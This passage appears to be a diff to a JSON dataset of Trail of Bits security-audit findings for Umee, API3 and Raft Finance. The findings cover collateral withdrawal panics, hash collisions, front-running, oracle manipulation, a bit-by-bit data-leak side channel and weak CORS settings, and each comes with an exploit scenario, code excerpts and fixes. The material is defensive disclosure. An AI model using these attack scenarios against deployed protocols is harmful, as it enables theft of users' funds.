reproduce this issue, use the test shown in gure 15.2. Exploit Scenario A user of the Umee system who has enabled the collateral setting lends 1,000 UMEE tokens. The user later tries to withdraw 1,001 UMEE tokens. Due to the lack of validation of the collateralToWithdraw value, the transaction causes a panic. However, the panic is recovered, and the transaction nishes with a panic error . Because the system does not provide a proper error message, the user is confused about why the transaction failed. Recommendations Short term, when a user attempts to withdraw collateral, have the WithdrawAsset function check whether the collateralToWithdraw value is less than or equal to the collateral balance of the users account and return an error if it is not. This will prevent the function from panicking if the withdrawal amount is too large. Long term, integrate the test shown in gure 15.2 into the codebase and extend it with additional assertions to verify other program states. func (s *IntegrationTestSuite) TestWithdrawAsset_InsufficientCollateral() { app, ctx := s.app, s.ctx lenderAddr := sdk.AccAddress([] byte ( \"addr________________\" )) lenderAcc := app.AccountKeeper.NewAccountWithAddress(ctx, lenderAddr) app.AccountKeeper.SetAccount(ctx, lenderAcc) // mint and send coins s.Require().NoError(app.BankKeeper.MintCoins(ctx, minttypes.ModuleName, initCoins)) s.Require().NoError(app.BankKeeper.SendCoinsFromModuleToAccount(ctx, minttypes.ModuleName, lenderAddr, initCoins)) // mint additional coins for just the leverage module; this way it will have available reserve // to meet conditions in the withdrawal logic s.Require().NoError(app.BankKeeper.MintCoins(ctx, types.ModuleName, initCoins)) // set collateral setting for the account uTokenDenom := types.UTokenFromTokenDenom(umeeapp.BondDenom) err := s.app.LeverageKeeper.SetCollateralSetting(ctx, lenderAddr, uTokenDenom, true ) s.Require().NoError(err) // lend asset err = s.app.LeverageKeeper.LendAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 1000000000 )) // 1k umee s.Require().NoError(err) // verify collateral amount and total supply of minted uTokens collateral := s.app.LeverageKeeper.GetCollateralAmount(ctx, lenderAddr, uTokenDenom) expected := sdk.NewInt64Coin(uTokenDenom, 1000000000 ) // 1k u/umee s.Require().Equal(collateral, expected) supply := s.app.LeverageKeeper.TotalUTokenSupply(ctx, uTokenDenom) s.Require().Equal(expected, supply) // withdraw more collateral than having - this panics currently uToken := collateral.Add(sdk.NewInt64Coin(uTokenDenom, 1 )) err = s.app.LeverageKeeper.WithdrawAsset(ctx, lenderAddr, uToken) s.Require().EqualError(err, \"TODO/FIXME: set proper error string here after fixing panic error\" ) // TODO/FIXME: add asserts to verify all other program state } Figure 15.2: A test that can be used to reproduce this issue", + "title": "1. Publish-subscribe protocol users are vulnerable to a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The API3 system implements a publish-subscribe protocol through which a requester can receive a callback from an API when specied conditions are met. These conditions can be hard-coded when the Airnode is congured or stored on-chain. When they are stored on-chain, the user can call storeSubscription to establish other conditions for the callback (by specifying parameters and conditions arguments of type bytes ). The arguments are then used in abi.encodePacked , which could result in a subscriptionId collision. function storeSubscription( [...] bytes calldata parameters, bytes calldata conditions, [...] ) external override returns ( bytes32 subscriptionId) { [...] subscriptionId = keccak256 ( abi .encodePacked( chainId, airnode, templateId, parameters , conditions , relayer, sponsor, requester, fulfillFunctionId ) ); subscriptions[subscriptionId] = Subscription({ chainId: chainId, airnode: airnode, templateId: templateId, parameters: parameters, conditions: conditions, relayer: relayer, sponsor: sponsor, requester: requester, fulfillFunctionId: fulfillFunctionId }); Figure 1.1: StorageUtils.sol#L135-L158 The Solidity documentation includes the following warning: If you use keccak256(abi.encodePacked(a, b)) and both a and b are dynamic types, it is easy to craft collisions in the hash value by moving parts of a into b and vice-versa. More specically, abi.encodePacked(\"a\", \"bc\") == abi.encodePacked(\"ab\", \"c\"). If you use abi.encodePacked for signatures, authentication or data integrity, make sure to always use the same types and check that at most one of them is dynamic. Unless there is a compelling reason, abi.encode should be preferred. Figure 1.2: The Solidity documentation details the risk of a collision caused by the use of abi.encodePacked with more than one dynamic type. Exploit Scenario Alice calls storeSubscription to set the conditions for a callback from a specic API to her smart contract. Eve, the owner of a competitor protocol, calls storeSubscription with the same arguments as Alice but moves the last byte of the parameters argument to the beginning of the conditions argument. As a result, the Airnode will no longer report API results to Alices smart contract. Recommendations Short term, use abi.encode instead of abi.encodePacked . Long term, carefully review the Solidity documentation , particularly the Warning sections regarding the pitfalls of abi.encodePacked .", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Low" ] }, { - "title": "16. Division by zero causes the LiquidateBorrow function to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Two operations in the x/leverage modules LiquidateBorrow method may involve division by zero and lead to a panic. The rst operation is shown in gure 16.1. If both repayValue and maxRepayValue are zero, the GTE (greater-than-or-equal-to) comparison will succeed, and the Quo method will panic. The repayValue variable will be set to zero if liquidatorBalance is set to zero; maxRepayValue will be set to zero if either closeFactor or borrowValue is set to zero. if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue) .Quo(repayValue) .TruncateInt() repayValue = maxRepayValue } Figure 16.1: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#452456 ) The second operation is shown in gure 16.2. If both reward.Amount and collateral.AmountOf(rewardDenom) are set to zero, the GTE comparison will succeed, and the Quo method will panic. The collateral.AmountOf(rewardDenom) variable can easily be set to zero, as the user may not have any collateral in the denomination indicated by the variable; reward.Amount will be set to zero if liquidatorBalance is set to zero. // reward amount cannot exceed available collateral if reward.Amount.GTE(collateral.AmountOf(rewardDenom)) { // reduce repayment.Amount to the maximum value permitted by the available collateral reward repayment.Amount = repayment.Amount.Mul(collateral.AmountOf(rewardDenom)) .Quo(reward.Amount) // use all collateral of reward denom reward.Amount = collateral.AmountOf(rewardDenom) } Figure 16.2: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#474480 ) Exploit Scenario A user tries to liquidate a loan. For reasons that are unclear to the user, the transaction fails with a panic. Because the error message is not specic, the user has diculty debugging the error. Recommendations Short term, replace the GTE comparison with a strict inequality GT (greater-than) comparison. Long term, carefully validate variables in the LiquidateBorrow method to ensure that every variable stays within the expected range during the entire computation . Write negative tests with edge-case values to ensure that the methods handle errors gracefully.", + "title": "2. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The API3 contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the API3 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "17. Architecture-dependent code ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In the Go programming language, the bit size of an int variable depends on the platform on which the code is executed. On a 32-bit platform, it will be 32 bits, and on a 64-bit platform, 64 bits. Validators running on dierent architectures will therefore interpret int types dierently, which may lead to transaction-parsing discrepancies and ultimately to a consensus failure or chain split. One use of the int type is shown in gure 17.1. Because casting the maxValidators variable to the int type should not cause it to exceed the maximum int value for a 32-bit platform, we set the severity of this nding to informational. for ; iterator.Valid() && i < int (maxValidators) ; iterator.Next() { Figure 17.1: An architecture-dependent loop condition in the EndBlocker method ( umee/x/oracle/abci.go#34 ) Exploit Scenario The maxValidators variable (a variable of the uint32 type) is set to its maximum value, 4,294,967,296. During the execution of the x/oracle modules EndBlocker method, some validators cast the variable to a negative number, while others cast it to a large positive integer. The chain then stops working because the validators cannot reach a consensus. Recommendations Short term, ensure that architecture-dependent types are not used in the codebase . Long term, test the system with parameters set to various edge-case values, including the maximum and minimum values of dierent integer types. Test the system on all common architectures (e.g., architectures with 32- and 64-bit CPUs), or develop documentation specifying the architecture(s) used in testing.", + "title": "3. Decisions to opt out of a monetization scheme are irreversible ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The API3 protocol implements two on-chain monetization schemes. If an Airnode owner decides to opt out of a scheme, the Airnode will not receive additional token payments or deposits (depending on the scheme). Although the documentation states that Airnodes can opt back in to a scheme, the current implementation does not allow it. /// @notice If the Airnode is participating in the scheme implemented by /// the contract: /// Inactive: The Airnode is not participating, but can be made to /// participate by a mantainer /// Active: The Airnode is participating /// OptedOut: The Airnode actively opted out, and cannot be made to /// participate unless this is reverted by the Airnode mapping(address => AirnodeParticipationStatus) public override airnodeToParticipationStatus; Figure 3.1: RequesterAuthorizerWhitelisterWithToken.sol#L59-L68 /// @notice Sets Airnode participation status /// @param airnode Airnode address /// @param airnodeParticipationStatus Airnode participation status function setAirnodeParticipationStatus( address airnode, AirnodeParticipationStatus airnodeParticipationStatus ) external override onlyNonZeroAirnode(airnode) { if (msg.sender == airnode) { require( airnodeParticipationStatus == AirnodeParticipationStatus.OptedOut, \"Airnode can only opt out\" ); } else { [...] Figure 3.2: RequesterAuthorizerWhitelisterWithToken.sol#L229-L242 Exploit Scenario Bob, an Airnode owner, decides to temporarily opt out of a scheme, believing that he will be able to opt back in; however, he later learns that that is not possible and that his Airnode will be unable to accept any new requesters. Recommendations Short term, adjust the setAirnodeParticipationStatus function to allow Airnodes that have opted out of a scheme to opt back in. Long term, write extensive unit tests that cover all of the expected pre- and postconditions. Unit tests could have uncovered this issue.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "18. Weak cross-origin resource sharing settings ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In the price-feeder s cross-origin resource sharing (CORS) settings, most of the same-origin policy protections are disabled. This increases the severity of vulnerabilities like cross-site request forgery. v1Router.Methods( \"OPTIONS\" ).HandlerFunc( func (w http.ResponseWriter, r *http.Request) { w.Header().Set( \"Access-Control-Allow-Origin\" , r.Header.Get( \"Origin\" )) w.Header().Set( \"Access-Control-Allow-Methods\" , \"GET, PUT, POST, DELETE, OPTIONS\" ) w.Header().Set( \"Access-Control-Allow-Headers\" , \"Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With\" ) w.Header().Set( \"Access-Control-Allow-Credentials\" , \"true\" ) w.WriteHeader(http.StatusOK) }) Figure 18.1: The current CORS conguration ( umee/price-feeder/router/v1/router.go#4652 ) We set the severity of this nding to informational because no sensitive endpoints are exposed by the price-feeder router. Exploit Scenario A new endpoint is added to the price-feeder API. It accepts PUT requests that can update the tools provider list. An attacker uses phishing to lure the price-feeder s operator to a malicious website. The website triggers an HTTP PUT request to the API, changing the provider list to a list in which all addresses are controlled by the attacker. The attacker then repeats the attack against most of the validators, manipulates on-chain prices, and drains the systems funds. Recommendations Short term, use strong default values in the CORS settings . Long term, ensure that APIs exposed by the price-feeder have proper protections against web vulnerabilities.", + "title": "4. Depositors can front-run request-blocking transactions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "A depositor can front-run a request-blocking transaction and withdraw his or her deposit. The RequesterAuthorizerWhitelisterWithTokenDeposit contract enables a user to indenitely whitelist a requester by depositing tokens on behalf of the requester. A manager or an address with the blocker role can call setRequesterBlockStatus or setRequesterBlockStatusForAirnode with the address of a requester to block that user from submitting requests; as a result, any user who deposited tokens to whitelist the requester will be blocked from withdrawing the deposit. However, because one can execute a withdrawal immediately, a depositor could monitor the transactions and call withdrawTokens to front-run a blocking transaction. Exploit Scenario Eve deposits tokens to whitelist a requester. Because the requester then uses the system maliciously, the manager blacklists the requester, believing that the deposited tokens will be seized. However, Eve front-runs the transaction and withdraws the tokens. Recommendations Short term, implement a two-step withdrawal process in which a depositor has to express his or her intention to withdraw a deposit and the funds are then unlocked after a waiting period. Long term, analyze all possible front-running risks in the system.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "19. price-feeder is at risk of rate limiting by public APIs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Price providers used by the price-feeder tool may enforce limits on the number of requests served to them. After reaching a limit, the tool should take certain actions to avoid a prolonged or even permanent ban. Moreover, using API keys or non-HTTP access channels would decrease the price-feeder s chance of being rate limited. Every API has its own rules, which should be reviewed and respected. The rules of three APIs are summarized below. Binance has hard, machine-learning, and web application rewall limits . Users are required to stop sending requests if they receive a 429 HTTP response code . Kraken implements rate limiting based on call counters and recommends using the WebSockets API instead of the REST API. Huopi restricts the number of requests to 10 per second and recommends using an API key. Exploit Scenario A price-feeder exceeds the limits of the Binance API. It is rate limited and receives a 429 HTTP response code from the API. The tool does not notice the response code and continues to spam the API. As a result, it receives a permanent ban. The validator using the price-feeder then starts reporting imprecise exchange rates and gets slashed. Recommendations Short term, review the requirements and recommendations of all APIs supported by the system . Enforce their requirements in a user-friendly manner; for example, allow users to set and rotate API keys, delay HTTP requests so that the price-feeder will avoid rate limiting but still report accurate prices, and log informative error messages upon reaching rate limits. Long term, perform stress-testing to ensure that the implemented safety checks work properly and are robust.", + "title": "5. Incompatibility with non-standard ERC20 tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The RequesterAuthorizerWhitelisterWithTokenPayment and RequesterAuthorizerWhitelisterWithTokenDeposit contracts are meant to work with any ERC20 token. However, several high-prole ERC20 tokens do not correctly implement the ERC20 standard. These include USDT, BNB, and OMG, all of which have a large market cap. The ERC20 standard denes two transfer functions, among others: transfer(address _to, uint256 _value) public returns (bool success) transferFrom(address _from, address _to, uint256 _value) public returns (bool success) These high-prole ERC20 tokens do not return a boolean when at least one of the two functions is executed. As of Solidity 0.4.22, the size of return data from external calls is checked. As a result, any call to the transfer or transferFrom function of an ERC20 token with an incorrect return value will fail. Exploit Scenario Bob deploys the RequesterAuthorizerWhitelisterWithTokenPayment contract with USDT as the token. Alice wants to pay for a requester to be whitelisted and calls payTokens , but the transferFrom call fails. As a result, the contract is unusable. Recommendations Short term, consider using the OpenZeppelin SafeERC20 library or adding explicit support for ERC20 tokens with incorrect return values. Long term, adhere to the token integration best practices outlined in appendix C .", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "20. Lack of prioritization of oracle messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Oracle messages are not prioritized over other transactions for inclusion in a block. If the network is highly congested, the messages may not be included in a block. Although the Umee system could increase the fee charged for including an oracle message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario The Umee network is congested. Validators send their exchange rate votes, but the exchange rates are not included in a block. An attacker then exploits the situation by draining the network of its tokens. Recommendations Short term, use a custom CheckTx method to prioritize oracle messages . This will help prevent validators votes from being left out of a block and ignored by an oracle. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", + "title": "6. Compromise of a single oracle enables limited control of the dAPI value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "By compromising only one oracle, an attacker could gain control of the median price of a dAPI and set it to a value within a certain range. The dAPI value is the median of all values provided by the oracles. If the number of oracles is odd (i.e., the median is the value in the center of the ordered list of values), an attacker could skew the median, setting it to a value between the lowest and highest values submitted by the oracles. Exploit Scenario There are three available oracles: O 0 , with a price of 603; O 1 , with a price of 598; and O 2 , which has been compromised by Eve. Eve is able to set the median price to any value in the range [598 , 603] . Eve can then turn a prot by adjusting the rate when buying and selling assets. Recommendations Short term, be mindful of the fact that there is no simple x for this issue; regardless, we recommend implementing o-chain monitoring of the DapiServer contracts to detect any suspicious activity. Long term, assume that an attacker may be able to compromise some of the oracles. To mitigate a partial compromise, ensure that dAPI value computations are robust.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { - "title": "21. Risk of token/uToken exchange rate manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Umee specication states that the token/uToken exchange rate can be aected only by the accrual of interest (not by Lend , Withdraw , Borrow , Repay , or Liquidate transactions). However, this invariant can be broken: When tokens are burned or minted through an Inter-Blockchain Communication (IBC) transfer, the ibc-go library accesses the x/bank modules keeper interface, which changes the total token supply (as shown in gure 21.2). This behavior is mentioned in a comment shown in gure 22.1. Sending tokens directly to the module through an x/bank message also aects the exchange rate. func (k Keeper) TotalUTokenSupply(ctx sdk.Context, uTokenDenom string ) sdk.Coin { if k.IsAcceptedUToken(ctx, uTokenDenom) { return k.bankKeeper.GetSupply(ctx, uTokenDenom) // TODO - Question: Does bank module still track balances sent (locked) via IBC? // If it doesn't then the balance returned here would decrease when the tokens // are sent off, which is not what we want. In that case, the keeper should keep // an sdk.Int total supply for each uToken type. } return sdk.NewCoin(uTokenDenom, sdk.ZeroInt()) } Figure 21.1: The method vulnerable to unexpected IBC transfers ( umee/x/leverage/keeper/keeper.go#6573 ) if err := k.bankKeeper.BurnCoins( ctx, types.ModuleName, sdk.NewCoins(token), Figure 21.2: The IBC library code that accesses the x/bank modules keeper interface ( ibc-go/modules/apps/transfer/keeper/relay.go#136137 ) Exploit Scenario An attacker with two Umee accounts lends tokens through the system and receives a commensurate number of uTokens. He temporarily sends the uTokens from one of the accounts to another chain (chain B), decreasing the total supply and increasing the token/uToken exchange rate. The attacker uses the second account to withdraw more tokens than he otherwise could and then sends uTokens back from chain B to the rst account. In this way, he drains funds from the module. Recommendations Short term, ensure that the TotalUTokenSupply method accounts for IBC transfers. Use the Cosmos SDKs blocklisting feature to disable direct transfers to the leverage and oracle modules. Consider setting DefaultSendEnabled to false and explicitly enabling certain tokens transfer capabilities. Long term, follow GitHub issues #10386 and #5931 , which concern functionalities that may enable module developers to make token accounting more reliable. Additionally, ensure that the system accounts for ination .", + "title": "7. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The execution of yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details these issues. CVE ID", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "22. Collateral dust prevents the designation of defaulted loans as bad debt ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "An accounts debt is considered bad debt only if its collateral balance drops to zero. The debt is then repaid from the modules reserves. However, users may liquidate the majority of an accounts assets but leave a small amount of debt unpaid. In that case, the transaction fees may make liquidation of the remaining collateral unprotable. As a result, the bad debt will not be paid from the module's reserves and will linger in the system indenitely. Exploit Scenario A large loan taken out by a user becomes highly undercollateralized. An attacker liquidates most of the users collateral to repay the loan but leaves a very small amount of the collateral unliquidated. As a result, the loan is not considered bad debt and is not paid from the reserves. The rest of the tokens borrowed by the user remain out of circulation, preventing other users from withdrawing their funds. Recommendations Short term, establish a lower limit on the amount of collateral that must be liquidated in one transaction to prevent accounts from holding dust collateral. Long term, establish a lower limit on the number of tokens to be used in every system operation. That way, even if the systems economic incentives are lacking, the operations will not result in dust tokens.", + "title": "8. DapiServer beacon data is accessible to all users ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The lack of access controls on the conditionPspDapiUpdate function could allow an attacker to read private data on-chain. The dataPoints[] mapping contains private data that is supposed to be accessible on-chain only by whitelisted users. However, any user can call conditionPspDapiUpdate , which returns a boolean that depends on arithmetic over dataPoint : /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters /// @dev This method does not allow the caller to indirectly read a dAPI, /// which is why it does not require the sender to be a void signer with /// zero address. [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 8.1: dapis/DapiServer.sol:L468-L502 An attacker could abuse this function to deduce one bit of data per call (to determine, for example, whether a users account should be liquidated). An attacker could also automate the process of accessing one bit of data to extract a larger amount of information by using a mechanism such as a dichotomic search. An attacker could therefore infer the value of dataPoin t directly on-chain. Exploit Scenario Eve, who is not whitelisted, wants to read a beacon value to determine whether a certain users account should be liquidated. Using the code provided in appendix E , she is able to conrm that the beacon value is greater than or equal to a certain threshold. Recommendations Short term, implement access controls to limit who can call conditionPspDapiUpdate . Long term, document all read and write operations related to dataPoint , and highlight their access controls. Additionally, consider implementing an o-chain monitoring system to detect any suspicious activity.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "23. Users can borrow assets that they are actively using as collateral ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "When a user calls the BorrowAsset function to take out a loan, the function does not check whether the user is borrowing the same type of asset as the collateral he or she supplied. In other words, a user can borrow tokens from the collateral that the user supplied. The Umee system prohibits users from borrowing assets worth more than the collateral they have provided, so a user cannot directly exploit this issue to borrow more funds than the user should be able to borrow. However, a user can borrow the vast majority of his or her collateral to continue accumulating lending rewards while largely avoiding the risks of providing collateral. Exploit Scenario An attacker provides 10 ATOMs to the protocol as collateral and then immediately borrows 9 ATOMs. He continues to earn lending rewards on his collateral but retains the use of most of the collateral. The attacker, through ash loans, could also resupply the borrowed amount as collateral and then immediately take out another loan, repeating the process until the amount he had borrowed asymptotically approached the amount of liquidity he had provided. Recommendations Short term, determine whether borrowers ability to borrow their own collateral is an issue. (Note that Compounds front end disallows such operations, but its actual contracts do not.) If it is, have BorrowAsset check whether a user is attempting to borrow the same asset that he or she staked as collateral and block the operation if so. Alternatively, ensure that borrow fees are greater than prots from lending. Long term, assess whether the liquidity-mining incentives accomplish their intended purpose, and ensure that the lending incentives and borrowing costs work well together.", + "title": "9. Misleading function name ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/API3.pdf", + "body": "The conditionPspDapiUpdate function always updates the dataPoints storage variable (by calling updateDapiWithBeacons ), even if the function returns false (i.e., the condition for updating the variable is not met). This contradicts the code comment and the behavior implied by the functions name. /// @notice Returns if the respective dAPI needs to be updated based on the /// condition parameters [...] function conditionPspDapiUpdate( bytes32 subscriptionId, // solhint-disable-line no-unused-vars bytes calldata data, bytes calldata conditionParameters ) external override returns (bool) { bytes32 dapiId = keccak256(data); int224 currentDapiValue = dataPoints[dapiId].value; require( dapiId == updateDapiWithBeacons(abi.decode(data, (bytes32[]))), \"Data length not correct\" ); return calculateUpdateInPercentage( currentDapiValue, dataPoints[dapiId].value ) >= decodeConditionParameters(conditionParameters); } Figure 9.1: dapis/DapiServer.sol#L468-L502 Recommendations Short term, revise the documentation to inform users that a call to conditionPspDapiUpdate will update the dAPI even if the function returns false . Alternatively, develop a function similar to updateDapiWithBeacons that returns the updated value without actually updating it. Long term, ensure that functions names reect the implementation.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "24. Providing additional collateral may be detrimental to borrowers in default ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "When a user who is in default on a loan deposits additional collateral, the collateral will be immediately liquidable. This may be surprising to users and may aect their satisfaction with the system. Exploit Scenario A user funds a loan and plans to use the coins he deposited as the collateral on a new loan. However, the user does not realize that he defaulted on a previous loan. As a result, bots instantly liquidate the new collateral he provided. Recommendations Short term, if a user is in default on a loan, consider blocking the user from calling the LendAsset or SetCollateralSetting function with an amount of collateral insucient to collateralize the defaulted position . Alternatively, document the risks associated with calling these functions when a user has defaulted on a loan. Long term, ensure that users cannot incur unexpected nancial damage, or document the nancial risks that users face.", + "title": "1. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft Finance contracts have enabled compiler optimizations. There have been several optimization bugs with security implications. Additionally, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them, so how well they are being tested and exercised is unknown. High-severity security issues due to optimization bugs have occurred in the past. For example, a high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG . Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity v0.5.6 . More recently, a bug due to the incorrect caching of Keccak-256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Raft Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3662,19 +6360,19 @@ ] }, { - "title": "25. Insecure storage of price-feeder keyring passwords ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Users can store oracle keyring passwords in the price-feeder conguration le. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the conguration le has overly broad permissions (like those shown in gure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (gure 25.2), which is a safer approach. Moreover, neither source provides information on dierent keyring back ends, and the example price-feeder conguration uses the \"test\" back end . An attacker with access to the conguration le on a users system, or to a backup of the conguration le, could steal the users keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwx rwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with addressA4F324A31DECC0172A83E57A3625AF4B89A91F1Fnot found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the conguration le used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder conguration le, which has been miscongured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the conguration le. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it nds that a private key le has overly broad permissions. Document the risks associated with storing a keyring password in the conguration le. Improve the price-feeder s keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about dierent keyring back ends and the addition of keyring entries, among other concepts. 26. Insu\u0000cient validation of genesis parameters Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-UMEE-26 Target: Genesis parameters", + "title": "2. Issues with Chainlink oracles return data validation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "Chainlink oracles are used to compute the price of a collateral token throughout the protocol. When validating the oracle's return data, the returned price is compared to the price of the previous round. However, there are a few issues with the validation: The increase of the currentRoundId value may not be statically increasing across rounds. The only requirement is that the roundID increases monotonically. The updatedAt value in the oracle response is never checked, so potentially stale data could be coming from the priceAggregator contract. The roundId and answeredInRound values in the oracle response are not checked for equality, which could indicate that the answer returned by the oracle is fresh. function _badChainlinkResponse (ChainlinkResponse memory response) internal view returns ( bool ) { return !response.success || response.roundId == 0 || response.timestamp == 0 || response.timestamp > block.timestamp || response.answer <= 0 ; } Figure 2.1: The Chainlink oracle response validation logic Exploit Scenario The Chainlink oracle attempts to compare the current returned price to the price in the previous roundID . However, because the roundID did not increase by one from the previous round to the current round, the request fails, and the price oracle returns a failure. A stale price is then used by the protocol. Recommendations Short term, have the code validate that the timestamp value is greater than 0 to ensure that the data is fresh. Also, have the code check that the roundID and answeredInRound values are equal to ensure that the returned answer is not stale. Lastly check that the timestamp value is not decreasing from round to round. Long term, carefully investigate oracle integrations for potential footguns in order to conform to correct API usage. References The Historical-Price-Feed-Data Project", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, { - "title": "27. Potential overows in Peggo's current block calculations ", - "html_url": 